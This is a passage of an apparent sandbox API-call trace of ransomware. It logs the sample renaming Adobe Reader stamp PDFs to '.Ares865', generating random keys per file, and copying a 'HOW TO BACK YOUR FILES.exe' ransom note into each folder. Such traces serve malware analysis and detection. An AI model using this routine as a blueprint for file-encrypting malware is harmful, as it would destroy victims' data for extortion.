pbBuffer=0x2ccce18) returned 1 [0173.725] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.727] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="StandardBusiness.pdf" | out: lpString1="StandardBusiness.pdf") returned="StandardBusiness.pdf" [0173.727] lstrlenW (lpString="StandardBusiness.pdf") returned 20 [0173.727] lstrlenW (lpString="Ares865") returned 7 [0173.727] lstrcmpiW (lpString1="ess.pdf", lpString2="Ares865") returned 1 [0173.728] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf.Ares865") returned 108 [0173.728] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standardbusiness.pdf.ares865"), dwFlags=0x1) returned 1 [0173.735] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\StandardBusiness.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standardbusiness.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.736] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98378) returned 1 [0173.736] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.737] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.737] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.743] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.744] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.744] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.746] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE" [0173.746] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE" [0173.746] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0173.746] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\how to back your files.exe"), bFailIfExists=1) returned 0 [0173.749] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.750] GetLastError () returned 0x0 [0173.750] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0173.750] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b10640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b10640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0173.751] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.751] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0173.751] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Dynamic.pdf" | out: lpString1="Dynamic.pdf") returned="Dynamic.pdf" [0173.751] lstrlenW (lpString="Dynamic.pdf") returned 11 [0173.751] lstrlenW (lpString="Ares865") returned 7 [0173.751] lstrcmpiW (lpString1="mic.pdf", lpString2="Ares865") returned 1 [0173.752] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf.Ares865") returned 99 [0173.752] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\dynamic.pdf.ares865"), dwFlags=0x1) returned 1 [0173.754] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\dynamic.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.754] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=58799) returned 1 [0173.754] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.755] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.755] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.760] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.760] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.760] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.762] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="SignHere.pdf" | out: lpString1="SignHere.pdf") returned="SignHere.pdf" [0173.762] lstrlenW (lpString="SignHere.pdf") returned 12 [0173.762] lstrlenW (lpString="Ares865") returned 7 [0173.762] lstrcmpiW (lpString1="ere.pdf", lpString2="Ares865") returned 1 [0173.762] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf.Ares865") returned 100 [0173.762] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\signhere.pdf.ares865"), dwFlags=0x1) returned 1 [0173.764] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\signhere.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.764] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=42656) returned 1 [0173.764] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.765] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.765] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.769] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.770] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.770] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.771] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="StandardBusiness.pdf" | out: lpString1="StandardBusiness.pdf") returned="StandardBusiness.pdf" [0173.771] lstrlenW (lpString="StandardBusiness.pdf") returned 20 [0173.771] lstrlenW (lpString="Ares865") returned 7 [0173.771] lstrcmpiW (lpString1="ess.pdf", lpString2="Ares865") returned 1 [0173.772] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf.Ares865") returned 108 [0173.772] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\standardbusiness.pdf.ares865"), dwFlags=0x1) returned 1 [0173.773] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\standardbusiness.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.774] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=102139) returned 1 [0173.774] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.775] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.775] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.783] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.784] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.784] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.786] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO" [0173.786] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO" [0173.786] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0173.786] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\how to back your files.exe"), bFailIfExists=1) returned 0 [0173.790] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.790] GetLastError () returned 0x0 [0173.790] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0173.790] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f804400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b10640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b10640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0173.791] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.791] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0173.791] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Dynamic.pdf" | out: lpString1="Dynamic.pdf") returned="Dynamic.pdf" [0173.791] lstrlenW (lpString="Dynamic.pdf") returned 11 [0173.791] lstrlenW (lpString="Ares865") returned 7 [0173.792] lstrcmpiW (lpString1="mic.pdf", lpString2="Ares865") returned 1 [0173.792] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\Dynamic.pdf.Ares865") returned 99 [0173.792] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\Dynamic.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\dynamic.pdf.ares865"), dwFlags=0x1) returned 1 [0173.794] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\Dynamic.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\dynamic.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.794] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=59361) returned 1 [0173.795] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.795] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.795] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.800] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.801] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.801] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.802] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="SignHere.pdf" | out: lpString1="SignHere.pdf") returned="SignHere.pdf" [0173.802] lstrlenW (lpString="SignHere.pdf") returned 12 [0173.802] lstrlenW (lpString="Ares865") returned 7 [0173.802] lstrcmpiW (lpString1="ere.pdf", lpString2="Ares865") returned 1 [0173.803] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\SignHere.pdf.Ares865") returned 100 [0173.803] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\SignHere.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\signhere.pdf.ares865"), dwFlags=0x1) returned 1 [0173.804] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\SignHere.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\signhere.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.804] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40123) returned 1 [0173.805] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.805] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.805] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.810] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.810] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.811] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.811] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="StandardBusiness.pdf" | out: lpString1="StandardBusiness.pdf") returned="StandardBusiness.pdf" [0173.812] lstrlenW (lpString="StandardBusiness.pdf") returned 20 [0173.812] lstrlenW (lpString="Ares865") returned 7 [0173.812] lstrcmpiW (lpString1="ess.pdf", lpString2="Ares865") returned 1 [0173.812] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\StandardBusiness.pdf.Ares865") returned 108 [0173.812] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\StandardBusiness.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\standardbusiness.pdf.ares865"), dwFlags=0x1) returned 1 [0173.814] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\StandardBusiness.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\standardbusiness.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.814] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94105) returned 1 [0173.814] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.815] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.815] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.822] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.823] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.823] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.824] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV" [0173.825] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV" [0173.825] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0173.825] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0173.828] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.829] GetLastError () returned 0x0 [0173.829] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0173.829] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8064c800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54b5c900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54b5c900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0173.830] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.830] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0173.830] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Dynamic.pdf" | out: lpString1="Dynamic.pdf") returned="Dynamic.pdf" [0173.830] lstrlenW (lpString="Dynamic.pdf") returned 11 [0173.830] lstrlenW (lpString="Ares865") returned 7 [0173.830] lstrcmpiW (lpString1="mic.pdf", lpString2="Ares865") returned 1 [0173.831] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Dynamic.pdf.Ares865") returned 99 [0173.831] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Dynamic.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\dynamic.pdf.ares865"), dwFlags=0x1) returned 1 [0173.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Dynamic.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\dynamic.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, 